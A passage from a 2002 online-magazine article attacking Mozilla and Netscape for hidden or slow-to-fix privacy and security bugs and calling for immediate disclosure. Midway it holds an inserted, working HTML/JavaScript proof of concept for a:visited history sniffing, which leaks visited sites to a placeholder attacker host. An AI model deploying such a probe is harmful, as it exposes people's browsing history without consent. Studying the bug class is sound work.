MozillaQuest the on-line computer magazine
September 30, 2002
Zero Tolerance for Privacy and Security Bugs

Mozilla and Netscape JavaScript Bugs Compromise Privacy and Security

Mike Angelo -- 30 September 2002 (c) - Page 2


Article Index

Anatomy of Mozilla Bug #145579

A Pattern of Known, Un-Fixed, Privacy Bugs in the Mozilla-Netscape Browsers

  • Oingo Bugs Fiasco
  • Mozilla Bug #32571

Duty To Disclose and To Fix Privacy and Security Bugs

Conclusion

Resources

Duty To Disclose and To Fix Privacy and Security Bugs

It certainly is curious that the Mozilla-Netscape developers did not fix Bug #145579 until after it was brought to public attention via Bugtraq. How many privacy and security bugs in the Mozilla-Netscape code-base are being kept secret from the public and left unfixed? Moreover, how many privacy and security bugs that are not hidden, such as Mozilla Bug #32571 and all its duplicates, are not being fixed in a timely manner?

It is past time for the Mozilla-Netscape developers to bring the status of Mozilla-Netscape privacy and security bugs and issues into the full light of day. Users of the Mozilla, Netscape, and other Mozilla-based browsers and products have a right to know just how safe or vulnerable their system security and individual privacy are when they use Mozilla-Netscape and other Mozilla-based products.

Of course there are legitimate concerns about giving potential crackers and others that would invade your privacy and/or attack your system a leg-up if the details of privacy and security bugs are revealed prematurely. However, we believe that such bugs can be listed and announced in a manner to alert users to privacy and security flaws in the Mozilla-Netscape code-base without giving sufficient detail to aid evildoers.

This duty to let users of computers know immediately about privacy and security violation exposures is not only applicable to the Mozilla-Netscape browser-suites and other Mozilla-based products. This duty and obligation to immediately advise computer users of privacy and security violation exposures is incumbent on all producers and vendors of computer products.

Moreover, we believe that producers and vendors of computer products should provide patches and/or upgrades that fix privacy and security violation exposures within 24-hours of a computer product producer's or vendor's knowledge of such exposures or risks.

We think that is reasonable. Computer products should not be released with privacy and security violation exposures and risks. Twenty-four hours to fix privacy and security violation exposures and risks is not unreasonable in light of the fact that computer products users are being subjected to such privacy and security violation exposures and risks -- until such time as privacy and security violation exposures or risks are publicly announced and fixed.

And if that means company big-shots as well as the little-shots have to go without sleep until the privacy and security violation exposures and risks they created and distributed are fixed -- well then tough! If this sounds harsh, it is. But it is time people started taking responsibility for their wrongdoings -- and releasing computer products with privacy and security violation exposures and risks is wrong.

AOL-Netscape and its Mozilla Organization allowing a security and data loss problem such as that reported in Mozilla Bug #32571 and its progeny to go more than two years without correction is a disgraceful travesty! Four months to disclose and fix Mozilla Bug #145579 is unacceptable. Releasing Mozilla 1.0 with the Oingo bugs was willfully negligent conduct. (Links to all mentioned bugs in the Resources section at the end of this article.)

Certainly there will be instances where privacy and security violation exposures and risks slip through even the best of product development and quality control programs. But immediate announcement of such privacy and security violation exposures and risks when discovered -- and their immediate correction -- goes to the integrity of computer product developers and producers -- and the quality of their products.

On the other hand trying to hide the existence of privacy and security violation exposures and risks from the light of day and from public attention goes to the lack of integrity of computer product producers and developers. Failure to immediately correct privacy and security violation exposures and risks goes to the lack of integrity of computer product developers and producers.

In the case of Mozilla Bug #145579 the AOL-Netscape-Mozilla people knew the privacy violation exposures and risks described by Bug #145579 were in the Mozilla-Netscape code. Yet they released not merely one product with the #145579 bug in it, they released several editions of their products with that bug in it. And that in our opinion is gross moral dishonesty!

Mozilla Bug #82275 is an example of a bug that is hidden from public view. This Bug #82275 was reported in May 2001 -- and it still is hidden from public view. For a hint of what Bug #82275 is about you can check Bug #86497, if you like. From Bug #86497, Bug #82275 does not appear to be a big deal. The point however, is that it is hidden from public view even though that bug was reported more than a year ago. Please see Figure 3.

Figure 3. Bug #82275 is hidden from open, public view. How many more bugs are the AOL-Netscape-Mozilla developers hiding from open, public view? Is hiding a bug report from open view for more than a year appropriate in Open Source Software?

Consider Mozilla privacy Bug #57351, "css on a:visited can load an image and/or reveal if visitor been to a site." It has been open for nearly two years. It is a P3-priority, major-severity bug targeted for Mozilla 1.2a. It is not hidden, but it is not fixed either. Because the leak comes from the stylesheet's a:visited rule, any Web site you visit can use it to test whether you have been to other sites, with or without JavaScript. Bug #32571 has been in the Mozilla-Netscape code-base for more than two years. Just how many privacy and security bugs and issues are in the Mozilla code-base -- whether hidden or public? (Links to all mentioned bugs in the Resources section at the end of this article.)
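The page below is an added example, written for this article and not taken from the bug report or from the Mozilla project, of the probe that Bug #57351 describes. The target URLs and the logging host (attacker.invalid) are placeholders constructed for the example. The a:visited background-image rules need no JavaScript at all: the browser fetches the image only for links already in the history, so the request itself is the leak. The script shows the second variant, reading the rendered link colour back with getComputedStyle. Both variants worked in Mozilla 1.x and Netscape 6/7; Firefox 4 and later and the other current browsers defeat them by restricting which properties :visited may set and by reporting the unvisited style to scripts.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>a:visited history probe (added example, not from the article)</title>
<style>
  /* Colours a script can read back: visited links get a distinct colour. */
  a.probe:link    { color: #0000ff; }
  a.probe:visited { color: #ff0000; }
</style>
<!-- Per-link rules are generated by the script below so that each
     leaked image request identifies which URL was visited. -->
<style id="perlink"></style>
</head>
<body>
<!-- Kept off-screen so the visitor sees nothing. -->
<div id="probes" style="position:absolute; left:-9999px;"></div>
<p id="result"></p>
<script>
// Constructed target list for the example. A real probe would list banks,
// webmail providers, forums, and so on. The logging host is a placeholder.
var LOG_HOST = "https://attacker.invalid/hit";
var targets = [
  "https://example.com/",
  "https://example.org/login",
  "https://example.net/"
];

// Variant 1 (CSS only; the rules could just as well be written statically
// into the page): a:visited carries a background-image, so the browser
// requests that image only for links the user has already visited. The
// index in the URL tells the logging host which site was in the history.
function buildVisitedImageRules() {
  var css = "";
  for (var i = 0; i < targets.length; i++) {
    css += "#probe" + i + ":visited { background-image: url(\"" +
           LOG_HOST + "?id=" + i + "\"); }\n";
  }
  document.getElementById("perlink").appendChild(document.createTextNode(css));
}

function buildProbes() {
  var holder = document.getElementById("probes");
  for (var i = 0; i < targets.length; i++) {
    var a = document.createElement("a");
    a.id = "probe" + i;
    a.className = "probe";
    a.href = targets[i];
    a.appendChild(document.createTextNode(targets[i]));
    holder.appendChild(a);
  }
}

// Variant 2: read the rendered link colour back. Mozilla 1.x and Netscape
// 6/7 report the real :visited colour; Firefox 4+ and current Chrome and
// Safari deliberately report the :link colour for every link, so this
// returns an empty list there.
function sniffHistory() {
  var hits = [];
  var links = document.getElementById("probes").getElementsByTagName("a");
  for (var i = 0; i < links.length; i++) {
    var colour = window.getComputedStyle(links[i], null)
                       .getPropertyValue("color")
                       .replace(/\s+/g, "").toLowerCase();
    // rgb(255,0,0) is the :visited colour from the stylesheet above.
    if (colour === "rgb(255,0,0)" || colour === "#ff0000") {
      hits.push(links[i].href);
    }
  }
  return hits;
}

buildProbes();
buildVisitedImageRules();
var hits = sniffHistory();
document.getElementById("result").appendChild(document.createTextNode(
  hits.length ? "Visited: " + hits.join(", ")
              : "Nothing reported (browser mitigates, or no hits)"));
</script>
</body>
</html>
```

Serve the page from any Web server, visit one of the target URLs in the same browser profile, then load the page. A 2002-era Mozilla reports the visited target and also requests the corresponding placeholder image; a current browser reports nothing and issues no request, which is the mitigation this bug class eventually got.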

We have a link to some 25 privacy and security bugs that were fixed between the Mozilla 1.0 release and the Mozilla 1.0.1 release in the Resources section at the end of this article. Please keep in mind that if you used and/or are still using Mozilla 1.0, you have these 25 bugs in your copy of the Mozilla browser suite. Mozilla bug reports with numbers lower than 149219 were filed prior to 5 June 2002, the day Mozilla 1.0 was released. Ten of those twenty-five bugs were known when Mozilla 1.0 was released -- unforgivable!

Here, with Mozilla Bug #145579, the Mozilla-Netscape developers over-used the excuse of confidentiality in order to publish several releases of their browser-suites with a known-to-them privacy problem. It was not until Sven Neuhaus made the privacy issues reported in Mozilla Bug #145579 public via his Bugtraq posting that Bug Report #145579 was made public and the bug fixed.

There is no announcement of this Mozilla Bug #145579 on the Mozilla Organization main Web site page. Nor did we find any announcement of the bug in AOL-Netscape's Browser Central page. That in our opinion is gross moral dishonesty!

Note: In this article, the focus has been primarily on the Mozilla browser suite with some mention of the Mozilla-based AOL-Netscape 6.x and 7.x browser suites. However, AOL is reported to be using the Mozilla Gecko layout engine for its CompuServe client software and testing Gecko for its AOL client software.

Are there hidden and/or privacy and security bugs in the Gecko versions used in and being tested for use in AOL and CompuServe client software? Is AOL releasing or testing AOL and CompuServe client software with known privacy and security bugs and issues? As long as AOL-Netscape and its Mozilla Organization have a policy of hiding privacy and security bugs and of releasing products with known privacy and security bugs without calling them to public attention, it certainly could be doing that.

In light of the Mozilla-Netscape developers intentionally releasing browsers with known-to-them privacy and security bugs, they ought to make all security-sensitive, nsconf (Netscape Confidential), and any other hidden bugs public forthwith. The public has a right to know to what privacy invasions and security exploits they are subject by using the Mozilla, Netscape, and Mozilla-based browsers.

If the Mozilla-Netscape developers fail so to make these hidden bugs public without delay, then anyone who has access to the hidden bugs in the Mozilla Bugzilla database ought to have the courage and moral fiber to do as Sven Neuhaus did and post the information about those bugs to Bugtraq forthwith!

Conclusion

In the meantime, we strongly recommend that you turn JavaScript off in Mozilla, Netscape, and other Mozilla-based browsers -- if AOL-Netscape's Mozilla Organization's callous disregard for your privacy and the security of your system has not already caused you to switch to a better browser. Bear in mind that turning off JavaScript does not close the CSS-only side of Bug #57351: the a:visited stylesheet rule fetches its image whether or not scripting is enabled.

AOL-Netscape's Mozilla Project is supposed to be an Open Source Software project. However, it has been hiding and covering up privacy and security problems for months and years.

Should an Open Source Software project hide and cover up privacy and security problems in its products -- for months and years? We do not think so. Open means Open!




For more information about how Mozilla bugs affect the user experience in general, please see our articles A Quick Look at Some Mozilla 1.0 Browser-Suite Annoyances, Bugs, And Issues, Mozilla 1.0 Browser Quick Look, and Mozilla 1.0 Browser-Suite's E-Mail & News Quick Look. Incidentally, please check the MozillaQuest Magazine front-page (mozillaquest.com) sidebar every now and then for bug-count updates and for upcoming Mozilla Milestone progress updates.




Resources


Sven Neuhaus' Bugtraq posting, privacy leak in Mozilla


Bugs


Bug #32571

Bug #57351

Bug #82275

Bug #86497

Bug #145579

Bug #170165

Bugs Fixed Between the Mozilla 1.0 Release and the Mozilla 1.0.1 and 1.1 Releases



Copyright 2000-2002 -- MozillaQuest -- Brodheadsville, Pa..USA -- All Rights Reserved

